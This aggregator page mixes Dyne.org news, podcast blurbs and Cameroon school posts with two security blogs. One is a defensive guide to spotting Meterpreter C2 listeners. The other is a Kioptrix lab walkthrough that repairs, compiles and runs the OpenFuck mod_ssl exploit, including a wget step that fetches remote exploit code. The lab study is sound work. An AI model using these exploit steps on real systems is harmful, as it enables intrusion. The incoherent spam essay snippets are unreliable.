April 28, 2017

In the news

The vintage computing museum is in Sicily - Wired.it

Wired.it
Three organizations are involved: Freaknet Medialab itself, Dyne.org, a forge of free-software programmers, and Poetry Hacklab, a free-computing laboratory. Recently it has gained the support of Interlogica, a Veneto-based company engaged in projects ...

April 26, 2017

In the news

Trasformatorio, performance art in Scaletta until May 1 - Lettera Emme

Lettera Emme
The event is organized by Siddharte and Dyne.org under the patronage of the municipal administration of Scaletta Zanclea and in collaboration with WISH (World International Sicilian Heritage), CairoTronica (Cairo International Symposium of Digital Arts ...

April 24, 2017

Data Knightmare

DataKnightmare 1x28 - The mother of all data grabs

Did you think that handing five years of medical records of 700,000 patients to Google for free and without any oversight was the worst of it? Welcome to the mother of all data grabs, where a prime minister promises the health data of an entire nation to IBM. No objectives, no oversight, no guarantees, no economic return, no tender. And without telling anyone.

by Runtime Radio

April 21, 2017

videogame confessional forum

jeremy penner

So, my name's Jeremy Penner. I'm 33. Living right now in Ottawa, Ontario in Canada. I don't know, I've been programming since I was old enough to read, which was three or four. So, I've always been...

by david wolinsky

Informatic school is in southwest Cameroon

TECHSHARE 2016

TECHSHARE 2016

Linux Friends say thank you, Techshare, for your unfailing support to Future Star Academy. Your support has made us grow to maturity, with many good players in all categories, both male and female.


The President of Future Star Academy is Eboumbou Jacques Marcel

Secretary is Ngainku Pauli Chanceline

Director is Abassonga Noga Monique

Treasurer is Lolo Marthe Mireille

The Manager is Tabot Tabe Henry

Contact +237 674 956 363 and +237 699 920 173

 

by admin

SWISS FRIENDS 2016

SWISS FRIENDS SUPPORT 2016

Swiss Friends have for one year now supported the objectives, activities and development of the Association of Linux Friends Limbe. Swiss Friends have paid for tiles to be put on the floor of the classrooms and staircase, roofing of the building, paying motivation for seven teachers, and of course provided a Toyota Rav4 for the Association. Linux Friends want to thank all the committee members of Swiss Friends 2016; you have all worked hard until now. We know how challenging it has been but we give God all the Glory.


by admin

In the news

Trasformatorio: in Scaletta Zanclea, artists from all over the world for a sustainable future - Sikily News

Sikily News
The event is organized by Siddharte and Dyne.org under the patronage of the municipal administration and in collaboration with WISH (World International Sicilian Heritage), CairoTronica (Cairo International Symposium of Digital Arts), MUSIF (Museo ...

April 20, 2017

Informatic school is in southwest Cameroon

Computer School with Solar Section

The educational project run by the Association of Linux Friends Limbe/Cameroon

 

Short Project Description. The computer school run by the Linux Friends in Limbe/Cameroon includes an annual course providing basic knowledge in computer science as well as sporadic advanced-level IT courses. Born out of necessity, the school is increasingly also working on electricity production, in response to the fact that in large parts of Cameroon the power supply needed to operate computers is not assured.

Students pay a symbolic school fee. The training curriculum and teaching methods (e-learning) are developed in accordance with the students' requests. Upon successful completion of the annual course, students receive a certificate approved by the local authorities. The certificate is well appreciated by participants and considered an entry point to working life. In particular, it enables women to take a first important step towards the formal economic sector.

The educational program is offered in the day school and in evening classes. The teaching staff is recruited among the graduates of the school. At present, the majority of students and teachers are women. In the past year, 30 graduates (out of about 50 students enrolled) obtained the final certificate.

The Computer School of Linux Friends Limbe was initiated ten years ago by the Swiss Michel Pauli and the Cameroonian Chanceline Ngainku and is registered as a non-profit organization under the name Association of Linux Friends Limbe. As a result of continuous trials and inventive work by the local project team, and thanks to worldwide advances in low-energy mini-computers, the school today has well-functioning technical equipment (based on Raspberry Pi 2 and 3 and PiNet) with a total of 17 computer workstations. The school has Internet access. Part of the computer equipment is solar-powered.

As the next big step, the project aims to develop and stabilize advanced-level training. Students are to be able to qualify further in the ICT and solar systems sector. The objective is to realize a qualified training program modelled on the dual vocational training system. Maintenance of the school's network, as well as commissioned work in computer and solar system installation, will allow students to put the acquired theoretical knowledge into practice. In order to maintain and develop the project's current know-how, the present eight staff positions (including administration and domestic services) need to be expanded to eleven adequately paid positions.

The Context. In Cameroon, children from less well-off families generally have little chance of obtaining a good professional education. The number of schools and study places offered by the State is not sufficient. Private schools are expensive, and only expensive schools are in a position to provide the equipment and know-how needed to teach computer science. Dual vocational training as a training method is virtually non-existent. – Cameroon is ranked 152 out of 186 countries on the United Nations Human Development Index. Unemployment is high; at the same time the country is registering a shortage of skilled workers. Development projects working in the educational field complain of difficulties when trying to recruit specialists for computer and solar system installations. Such projects may be considered potential partners providing commissioned work for educational projects trying to realize dual vocational training in Cameroon. – In the Cameroonian economy women are as active as men, but they tend to work in precarious conditions in the informal sector. If the family lacks money for the children's education, girls usually come last.

Objectives 2016/2017. End of 2016: The basic course (beginners' class) runs optimally. The persons responsible for developing the advanced-level concept are determined. End of 2017: A training concept and a financing plan for the advanced level are designed. With a view to cooperation, contacts with Swiss training centers are initiated.

by admin

April 18, 2017

In the news

"The published documents on the alleged NSA malware give information to criminals" - RT en français

RT en français
The alleged NSA cyber-infiltration tools could be used by anyone able to reproduce and modify computer code, says Denis Roio, developer and co-founder of Dyne.org. A hacker group named Shadow ...

Everything ready for the third edition of Trasformatorio in Scaletta Zanclea - Stretto web

Stretto web
The event is organized by Siddharte and Dyne.org under the patronage of the municipal administration of Scaletta Zanclea and in collaboration with WISH (World International Sicilian Heritage), CairoTronica (Cairo International Symposium of Digital Arts ...

April 17, 2017

Data Knightmare

dataKnightmare 1x27 - Timeo Danaos

"In God we trust, all others bring data?" Yes, if only. DataKnightmare is afraid of charlatans, even when they bring data -- indeed, especially then; because today data serve to justify the decision one wants to take, not to discover which decision is the right one. An Easter rant.

by Runtime Radio

April 16, 2017

In the news

'Released docs on alleged NSA malware provide instructions for criminals' - RT


RT

'Released docs on alleged NSA malware provide instructions for criminals'
RT
Alleged NSA cyber-infiltration tools empower criminals and intelligence agencies to develop more in this direction, and could be used by anyone able to reproduce and modify the code, software developer and co-founder of Dyne.org Denis Roio says.

Tomb, the Crypto Undertaker 2.4

… – Changes: This release introduces a major new feature with support for asymmetric encryption of Tomb keys using public/private GPG key pairs. It is now possible to protect a Tomb key using a GPG key (which can also be password-less for automations) as well as to encrypt a Tomb key for multiple recipients (list of G

by Jaromil

April 13, 2017

Trasformatorio

Easy Approaches To Manage Stress

On the other hand, your article might bring about a demand for actions centered on patterns of cause and effect you have recognized. The cause and effect essay may end in numerous ways. Remember the length requirements of the article. In this section you'll discover examples of essays belonging to different article kinds and manners of […]

by Victor

Advantages and Disadvantages of HMO and PPO Healthcare Plans

Man understands he has total free will. Men tend to believe the cosmos was designed for their unique use. If somebody understands that he or she can't understand the Lord, then they won't attempt to judge other individuals. Every individual understands their particular talents, weaknesses and potential. There are numerous methods a willing individual has the skill […]

by Victor

April 11, 2017

Chokepoint

Hunting Red Team Meterpreter C2 Infrastructure

Introduction

This is part 2 of hunting Red Team C2 Infrastructure. Part 1 covered finding Empire C2 end points. In this post, we will show how to do the same for Meterpreter. There were no immediate crashing bugs found in the Meterpreter HTTP/S handler, but there is still enough information to profile these end points.

Meterpreter

Meterpreter is an advanced C2 infrastructure often used as a payload with the popular Metasploit exploit framework. It's cross-platform and highly extensible. In this post, we will focus on finding the reverse HTTP/S handlers for Meterpreter.

Meterpreter Headers

Sending the request GET / HTTP/1.0 returned the following headers.


HTTP/1.1 200 OK
Connection: close
Server: Apache
Content-Length: 44

What stands out here (as with Empire) is the general lack of headers that would normally be present in a response. Also, we used HTTP/1.0 as the protocol, but the reply is still HTTP/1.1.

Meterpreter default page


<html><body><h1>It works!</h1></body></html>

Hashes of the default page

MD5: c7b4690c8c46625ef0f328cd7a24a0a3
SHA1: 12179caec26a089cabcbb75c4dbe0bdfe60951f7
SHA2: 8f3ff2e2482468f3b9315a433b383f0cc0f9eb525889a34d4703b7681330a3fb

Finding Meterpreter Listeners with Shodan

Shodan is a search engine for security researchers. It routinely scans common ports across the Internet and makes the data publicly available and easily searchable. APIs are also provided to automate many of the tasks involved.

Using the common headers, and default web page listed above, we are able to narrow down the list of possible Meterpreter C2 node candidates on the Internet with a simple query.


'Server: Apache' 'It works!' -'Content-Type' 'Length: 44'

You'll notice that the results returned are all HTTP/1.1, with profiles matching what we scoped out above.

Random URLs

Another characteristic that makes Meterpreter listeners easy to identify is that all requests that aren't to the backend result in the same response. A random URL gets the same response as grabbing the index, whereas a legitimate server will typically produce a 404 error.

GET /lkafjdklfjasdklfjalkdjflkajd HTTP/1.0

Changing default values

There's no excuse for leaving your C2 node exposed to the entire Internet. Use whitelisting of IP space to keep your tests in scope and to avoid having other people attack your nodes. The default server name and page discussed above can be changed through the advanced settings.


use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 8000
show advanced
set MeterpreterServerName nginx
set HttpUnknownRequestResponse httml_here

Going beyond Shodan

In case there are any questions about the servers found being Meterpreter listeners, the following is a valid URI that will download Stage1 of the Meterpreter session from any given reverse HTTP/S listener.


GET /huO7Mf9GbAoRFBAVSfkxDwLTm3Wcz8n3kuXycv7k4vWV-_dXg3aY1iQy83Cejls15IeYlhUZ0QMT8S1zHKR33-Ga1rVIiV6QNFjXzTgr4lwNq_YR1tqyIbl9ddVzJ8UeYWJ0MJnThtVJ7d46IZnwHYok-XXZJrhqgUaaJMQtmCGCQWFA9tXMVtZtQEaR9Hse2Muw-P5TX4M7LKtm93LLFCT5i1NshdiwcWOnVJq HTTP/1.0

As discussed in part 1, we can use Scans.io data to get a broader search of HTTPS servers. If you still have a copy of the data, you can run a zgrep search like the following to identify possible C2 nodes in it.


zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result will be a file containing JSON data for each host that returned the default Meterpreter HTML. You can parse this file and extract each IP address that should be tested.
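The listener profile from the header and default-page sections, and the scans.io pivot just described, as one added example (not Chokepoint's code): it scores a response pair against the traits the post lists and pulls candidate IPs out of JSON lines that contain the base64 default body. The fingerprint values come from the post; the sample responses and JSON lines are constructed, and the top-level "ip" key in the scan records is an assumption.

```python
"""Fingerprint HTTP responses against the default Meterpreter reverse HTTP/S
listener profile from the post, and mimic the scans.io pivot (zgrep for the
base64 default body, then pull out the IPs). Added example, not Chokepoint's
code. Fingerprint values come from the post; every sample below is constructed
and the scans.io record layout (a top-level "ip" key) is an assumption."""
import base64
import hashlib
import json
from typing import List, Optional

# Body served by an unmodified Meterpreter HTTP/S handler (from the post, 44 bytes).
DEFAULT_BODY = b"<html><body><h1>It works!</h1></body></html>"
DEFAULT_BODY_MD5 = "c7b4690c8c46625ef0f328cd7a24a0a3"        # from the post
DEFAULT_BODY_B64 = base64.b64encode(DEFAULT_BODY).decode()  # the zgrep pattern


def parse_response(raw: bytes) -> dict:
    """Split a raw HTTP response into version, status code, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    version, status = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"version": version, "status": status, "headers": headers, "body": body}


def fingerprint(index_raw: bytes, random_url_raw: Optional[bytes] = None,
                request_version: str = "HTTP/1.0") -> List[str]:
    """Return the default-Meterpreter indicators shown by a response to "/"
    and, optionally, by the response to a random path on the same host."""
    idx = parse_response(index_raw)
    hdrs = idx["headers"]
    found = []
    if hdrs.get("server") == "Apache":
        found.append("server_apache")
    if "content-type" not in hdrs:          # a real Apache always sends one
        found.append("no_content_type")
    if hdrs.get("content-length") == str(len(DEFAULT_BODY)):
        found.append("content_length_44")
    # Weak on its own (Apache also answers HTTP/1.0 requests with HTTP/1.1),
    # but it is one of the traits the post lists, so report it.
    if request_version == "HTTP/1.0" and idx["version"] == "HTTP/1.1":
        found.append("http_version_mismatch")
    if len(hdrs) <= 3:                      # Date, Content-Type etc. are missing
        found.append("sparse_headers")
    body_md5 = hashlib.md5(idx["body"]).hexdigest()
    if idx["body"] == DEFAULT_BODY or body_md5 == DEFAULT_BODY_MD5:
        found.append("body_default")
    if random_url_raw is not None:
        rnd = parse_response(random_url_raw)
        # A legitimate server answers a junk path with 404; the listener
        # returns the same 200 + default page for everything.
        if rnd["status"] == "200" and rnd["body"] == idx["body"]:
            found.append("random_url_same_body")
    return found


def candidate_ips(json_lines) -> List[str]:
    """Python equivalent of the post's zgrep over a scans.io dump followed by
    IP extraction. Assumes each record carries a top-level "ip" field."""
    ips = []
    for line in json_lines:
        if DEFAULT_BODY_B64 not in line:    # same test as the zgrep pattern
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(rec, dict) and rec.get("ip"):
            ips.append(rec["ip"])
    return ips


# Constructed sample: an unmodified listener answers "/" and any junk path alike.
SAMPLE_LISTENER = (b"HTTP/1.1 200 OK\r\nConnection: close\r\nServer: Apache\r\n"
                   b"Content-Length: 44\r\n\r\n" + DEFAULT_BODY)
# Constructed sample: a real Apache answering a junk path.
SAMPLE_LEGIT_404 = (b"HTTP/1.1 404 Not Found\r\nDate: Tue, 11 Apr 2017 10:00:00 GMT\r\n"
                    b"Server: Apache\r\nContent-Type: text/html; charset=iso-8859-1\r\n"
                    b"Content-Length: 18\r\n\r\n<h1>Not Found</h1>")
# Constructed stand-in for scans.io JSON lines (record layout assumed).
SAMPLE_SCAN_LINES = [
    json.dumps({"ip": "192.0.2.10", "body": DEFAULT_BODY_B64}),
    json.dumps({"ip": "192.0.2.11", "body": base64.b64encode(b"<html>shop</html>").decode()}),
    "garbage line that is not JSON",
]

if __name__ == "__main__":
    print("listener :", fingerprint(SAMPLE_LISTENER, SAMPLE_LISTENER))
    print("legit    :", fingerprint(SAMPLE_LEGIT_404, SAMPLE_LEGIT_404))
    print("scan hits:", candidate_ips(SAMPLE_SCAN_LINES))
```

Treat the indicator list as a score to triage, not a verdict: a server that trips only server_apache and http_version_mismatch is ordinary Apache, while the full set plus the Stage1 URI check from the next section is what confirms a listener.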

Happy hunting.

by stderr (noreply@blogger.com)

Data Knightmare

dataKnightmare 1x26 - Sovereignty over data

The natives of the Americas traded gold and gems for worthless mirrors and beads. Today a public hospital hands over millions of medical records pro bono to a technology company so that it can develop diagnostic applications. Spot the difference. Data may be the new oil. The problem is that people are not fossils.

by Runtime Radio

April 09, 2017

Museo dell Informatica funzionante

Ora e sempre Resistenza: basic electronics course, 4th edition!

From tomorrow, April 11, 2017, until Friday, April 14, 2017, every day from 16:00 to 19:00, we will hold the fourth edition of our fantastic basic electronics course, at the Officine Babilonia – Area Ex Officine Ferroviarie, Viale Giacomo Mancini, Cosenza. (Map)

This fourth edition is reserved for migrants and refugees hosted by "La Kasbah", and will probably be held in English.

Subscriptions are closed. We look forward to seeing you at the next edition! 😉

The post Ora e sempre Resistenza: basic electronics course, 4th edition! appeared first on Museo dell'Informatica Funzionante.

by asbesto

April 08, 2017

videogame confessional forum

gennifer hutchison

Okay, yeah. My name is Gennifer Hutchison. I'm 39 and I am based in Los Angeles. I'm a television writer and while I also write for features, I'm probably best known for writing on Breaking Bad and...

by mark riechers

April 07, 2017

In the news

Did Amsterdam give birth to a digital monster with the internet? - Netkwesties

Netkwesties
The winner was Totem Open Health, a complex open source project for the safe use of digitally collected medical data. An honourable mention went to Dowse.eu by Dyne.org, a privacy aid for the Internet of Things. The jury was chaired ...

April 06, 2017

Chokepoint

Fixing and troubleshooting OpenFuck Exploit

In a previous post I went over a walkthrough for Kioptrix Level 1. I had some issues and wanted to document them for anyone else who may run into them. I'll admit that my first problem was getting ahead of myself and trying to compile the source code before doing anything else. Finally, googling gave the answer that was right smack dab in front of my face: the first 8 lines of the source.


/*
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/

Beyond doing what is outlined on paulsec.github.io, I had done a dist-upgrade on Kali, which seemed to have messed with some other settings. On top of installing libssl-dev it appeared I was missing some more SSL libraries, and I'll be honest in saying I'm not sure which one fixed my issue, but I ended up installing libssl1.0-dev, libssl1.0.2 and libssl1.1 as outlined below.


root@kali:~# apt-cache search libssl
cl-plus-ssl - Common Lisp interface to OpenSSL
dcmtk - OFFIS DICOM toolkit command line utilities
dlang-openssl - D version of the C headers for openssl
libdcmtk-dev - OFFIS DICOM toolkit development libraries and headers
libdcmtk8 - OFFIS DICOM toolkit runtime libraries
libssl-dev - Secure Sockets Layer toolkit - development files
libssl-doc - Secure Sockets Layer toolkit - development documentation
libssl-ocaml - OCaml bindings for OpenSSL (runtime)
libssl-ocaml-dev - OCaml bindings for OpenSSL
libssl1.0-dev - Secure Sockets Layer toolkit - development files
libssl1.0.2 - Secure Sockets Layer toolkit - shared libraries
libssl1.1 - Secure Sockets Layer toolkit - shared libraries
perl-openssl-defaults - version compatibility baseline for Perl OpenSSL packages
r-cran-openssl - GNU R toolkit for encryption, signatures and certificates based on OpenSSL

The point of this is that you may have some missing libraries, and trying to compile the source without them doesn't exactly tell you that you're missing them or which ones. So if you are still getting errors when compiling after following what is outlined on paulsec.github.io, you may want to try installing those other SSL libraries like I had to.

by k0ncepts (noreply@blogger.com)

Kioptrix 1 - Vulnhub Walkthrough - ssl_mod

Introduction

This is the second walkthrough I'm doing in the series. I'm tackling VMs that are said to be similar to what's on the OSCP PWK. Since I'll be tackling the OSCP again in the future, I figure this will be good practice in the meantime.

Kioptrix is a series itself with, I believe, 5 vulnerable VMs geared towards beginners, and since that's still what I consider myself, I'm going to tackle this whole series.

I had some trouble early on with the initial port from the VMware vmdk to VirtualBox, since that's what I'm currently using. Porting it over isn't hard; I just had to remember how from the last time I did it, and a quick google turned up the easy information I had forgotten. Also to note, my version of VirtualBox defaulted to SSD for the hard drive, but Kioptrix wasn't having that and gave me a kernel panic. Changing that to an IDE hard drive fixed it. The next issue was getting DHCP to issue an IP address. I have pfSense running for the internal network to keep my environment safe and not let anything in or out other than the host OS. For whatever reason Kioptrix didn't like the Intel PRO/1000 virtual chipset, so I had to change that to PCnet-PCI II for it to get DHCP. I assume that has something to do with my version of VirtualBox and how old the kernel on the VM is. Either way, I got it working.

Enumeration

As always I start by enumerating the ports to see what's open, gathering headers, versions and OS information. ENUMERATE ALL THE THINGS!


root@kali:~# nmap -sV -Pn -p1-65535 -A 172.16.2.13 --open

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-02 13:57 CDT
Nmap scan report for 172.16.2.13
Host is up (0.00033s latency).
Not shown: 65529 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32770/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2017-04-02T19:56:59+00:00; +59m19s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:AF:56:C9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 59m18s, deviation: 0s, median: 59m18s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

TRACEROUTE
HOP RTT ADDRESS
1 0.33 ms 172.16.2.13

So just the open ports and services give a great deal of information. We see both port 80 and 443 open, so let's run nikto and see what it comes up with next.


root@kali:~# nikto -host 172.16.2.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.2.13
+ Target Hostname: 172.16.2.13
+ Target Port: 80
+ Start Time: 2017-04-05 21:25:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 22:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 17 error(s) and 19 item(s) reported on remote host
+ End Time: 2017-04-05 21:33:12 (GMT-5) (463 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

I highlighted the part that looked most interesting to me. It seems there's a remote buffer overflow which allows attackers to kill any process on the system, CVE-2002-0082, so let's google around for that.

Looks like we have an exploit from exploit-db! That's very hopeful. Before going all out compiling and attacking, read the source first. The source tells you it's outdated, needs some updates, and shows a URL to head to. Remember the CVE is from 2002! Heading over to the URL, it shows the following updates that need to be made.


apt-get install libssl-dev

Add the following headers to the source code:


#include <openssl/rc4.h>
#include <openssl/md5.h>

Next, search the source code for "wget" (without the quotes) and replace the URL you find with this one:


http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Next find line 961 and add "const" to the beginning; it should look like the following:

const unsigned char *p, *end;

Finally we need to compile it


gcc -o OpenFuck 764.c -lcrypto

I did mine slightly differently, since my lab doesn't go out to the Internet other than from my Kali box if I change the network configuration. So I downloaded ptrace-kmod.c from packetstormsecurity to my Kali box, moved it to /var/www/html, started Apache and changed the line with wget to 172.16.2.13/ptrace-kmod.c.


wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
mv ptrace-kmod.c /var/www/html
service apache2 start

Finally let's run the exploit!


root@kali:~# ./openfuck

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./openfuck target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)


Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x03 - Cobalt Sun x (apache-1.3.26)
0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
0x05 - Conectiva 4 (apache-1.3.6)
0x06 - Conectiva 4.1 (apache-1.3.9)
0x07 - Conectiva 6 (apache-1.3.14)
0x08 - Conectiva 7 (apache-1.3.12)
0x09 - Conectiva 7 (apache-1.3.19)
0x0a - Conectiva 7/8 (apache-1.3.26)
0x0b - Conectiva 8 (apache-1.3.22)
0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
0x0d - Debian GNU Linux (apache_1.3.19-1)
0x0e - Debian GNU Linux (apache_1.3.22-2)
0x0f - Debian GNU Linux (apache-1.3.22-2.1)
0x10 - Debian GNU Linux (apache-1.3.22-5)
0x11 - Debian GNU Linux (apache_1.3.23-1)
0x12 - Debian GNU Linux (apache_1.3.24-2.1)
0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
0x14 - Debian GNU Linux (apache_1.3.24-3)
0x15 - Debian GNU Linux (apache-1.3.26-1)
0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
0x17 - Debian GNU Linux (apache-1.3.27)
0x18 - FreeBSD (apache-1.3.9)
0x19 - FreeBSD (apache-1.3.11)
0x1a - FreeBSD (apache-1.3.12.1.40)
0x1b - FreeBSD (apache-1.3.12.1.40)
0x1c - FreeBSD (apache-1.3.12.1.40)
0x1d - FreeBSD (apache-1.3.12.1.40_1)
0x1e - FreeBSD (apache-1.3.12)
0x1f - FreeBSD (apache-1.3.14)
0x20 - FreeBSD (apache-1.3.14)
0x21 - FreeBSD (apache-1.3.14)
0x22 - FreeBSD (apache-1.3.14)
0x23 - FreeBSD (apache-1.3.14)
0x24 - FreeBSD (apache-1.3.17_1)
0x25 - FreeBSD (apache-1.3.19)
0x26 - FreeBSD (apache-1.3.19_1)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x2b - FreeBSD (apache-1.3.22)
0x2c - FreeBSD (apache-1.3.22_7)
0x2d - FreeBSD (apache_fp-1.3.23)
0x2e - FreeBSD (apache-1.3.24_7)
0x2f - FreeBSD (apache-1.3.24+2.8.8)
0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
0x32 - FreeBSD (apache-1.3.27)
0x33 - Gentoo Linux (apache-1.3.24-r2)
0x34 - Linux Generic (apache-1.3.14)
0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
0x42 - Mandrake Linux 8.2 (apache-1.3.24)
0x43 - Mandrake Linux 9 (apache-1.3.26)
0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
